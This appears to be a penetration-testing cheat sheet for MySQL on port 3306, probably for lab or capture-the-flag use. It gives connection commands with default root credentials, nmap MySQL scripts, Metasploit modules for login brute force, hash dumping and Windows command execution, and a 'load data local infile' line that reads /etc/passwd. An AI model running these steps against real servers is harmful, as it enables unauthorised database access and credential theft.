Skip to content

Port 3306 - mysql

Connect

Install mysql client

sudo apt install default-mysql-client

Local

mysql --user=root --password=password

Remote

mysql -h $(target) --user=root --password=password

Mysql Commands

show databases;
use <database-name>;
show tables;
select * from <table-name>

Nmap

sudo nmap -p3306 -Pn -sS -sC -sV $(target) | tee nmap.mysql

Nmap - Script mysql-enum

nmap -p3306 --script=mysql-enum $(target)
  • mysql-audit
  • mysql-databases
  • mysql-dump-hashes
  • mysql-empty-password
  • mysql-enum
  • mysql-info
  • mysql-query
  • mysql-users
  • mysql-variables
  • mysql-vuln-cve2012-2122

Metasploit

use auxiliary/admin/mysql/mysql_sql
set USERNAME root
set PASSWORD password
set RHOST 10.10.125.83
run
  • use auxiliary/scanner/mysql/mysql_login
  • auxiliary/scanner/mysql/mysql_version
  • auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • auxiliary/scanner/mysql/mysql_hashdump #Creds
  • auxiliary/admin/mysql/mysql_enum #Creds
  • auxiliary/scanner/mysql/mysql_schemadump #Creds
  • exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

MySQL arbitrary read file by client

mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';